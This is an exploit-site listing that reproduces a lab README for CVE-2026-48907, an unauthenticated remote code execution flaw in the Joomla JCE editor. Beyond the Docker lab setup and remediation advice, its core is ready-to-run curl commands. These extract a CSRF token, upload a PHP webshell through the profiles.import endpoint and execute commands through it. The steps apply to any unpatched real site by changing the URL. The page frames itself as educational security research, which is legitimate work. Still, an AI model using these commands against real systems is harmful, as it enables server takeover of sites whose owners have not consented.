Exploit for Improper Access Control in Widgetfactorylimited Jce CVE-2026-48907

Name: Exploit for Improper Access Control in Widgetfactorylimited Jce CVE-2026-48907
Rating: 5 (2 reviews)
2026-06-30 | CVSS 10.0
## https://sploitus.com/exploit?id=8AC491E4-591B-5C56-8013-7E0DC7148722
# CVE-2026-48907 — Joomla JCE Unauthenticated RCE Lab

> **PSsec** Educational security research lab for CVE-2026-48907.

---

## Overview

**CVE-2026-48907** is a critical (CVSS 10.0) unauthenticated remote code execution vulnerability in **JCE (Joomla Content Editor)**, the most widely installed editor extension for Joomla, affecting all versions **≤ 2.9.99.4**.

The `profiles.import` endpoint accepts file uploads with zero authentication. An attacker can upload a malicious PHP file disguised as an XML profile, which gets written to the server's `tmp/` directory and executed directly via HTTP — no credentials required.

| Detail | Value |
|---|---|
| **CVE** | CVE-2026-48907 |
| **CVSS Score** | 10.0 Critical |
| **Affected Versions** | JCE ≤ 2.9.99.4 |
| **Fixed Versions** | JCE ≥ 2.9.99.5 |
| **CISA KEV Listed** | Yes — June 16, 2026 |
| **Actively Exploited** | Yes |

---

## Lab Setup

### Prerequisites

- Docker + Docker Compose
- Kali Linux (or any Linux host)

### 1. Start the vulnerable environment

```bash
docker compose up -d
```

### 2. Complete the Joomla installer

Open `http://localhost:8080` in your browser and complete the setup wizard using these credentials:

| Field | Value |
|---|---|
| Database Host | `db` |
| Database Name | `joomla` |
| Database User | `joomla` |
| Database Password | `joomlapass` |

### 3. Install the vulnerable JCE extension

```bash
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
```

Then in Joomla Admin → **System → Extensions → Install** → upload the ZIP.

---

## Exploitation

### 4. Extract CSRF token and session cookie

```bash
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)
```

### 5. Upload PHP webshell via unauthenticated profile import

```bash
curl -i -s -b cookies.txt -c cookies.txt \
  -F "profile_file=@shell.xml.php;type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"
```

### 6. Verify remote code execution

```bash
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"
```

Expected output: `uid=33(www-data) gid=33(www-data)`

---

## Files

| File | Description |
|---|---|
| `docker-compose.yml` | Spins up vulnerable Joomla 5.3.1 + MySQL 8.0 |
| `shell.xml.php` | Minimal PHP webshell payload |
| `instructions.txt` | Step-by-step exploitation notes |

---

## Remediation

Update JCE to **version 2.9.99.5 or later** immediately.

Official vendor advisory and free patch for older Joomla versions:
**[JCE Security Update — joomlacontenteditor.net](https://www.joomlacontenteditor.net/news/jce-security-update-and-a-free-patch-for-older-sites)**

---

## Credits

- Exploit tooling reference: [**JoomlaSniper by ynsmroztas**](https://github.com/ynsmroztas/JoomlaSniper)
- Vulnerability discovered in the wild by Phil Taylor of mySites.guru
- CISA KEV listing: June 16, 2026

---

## Disclaimer

> This repository is intended **strictly for educational and authorized security research purposes**.
> 
> Testing must only be performed against systems you **own or have explicit written permission** to test. Unauthorized use of this material against systems you do not own is illegal and unethical. The authors and Pansophical OU accept no liability for misuse of this content.
> 
> This lab environment is intentionally vulnerable. **Do not expose it to the internet or any untrusted network.**

---

*By [PSsec](https://pssec.io)*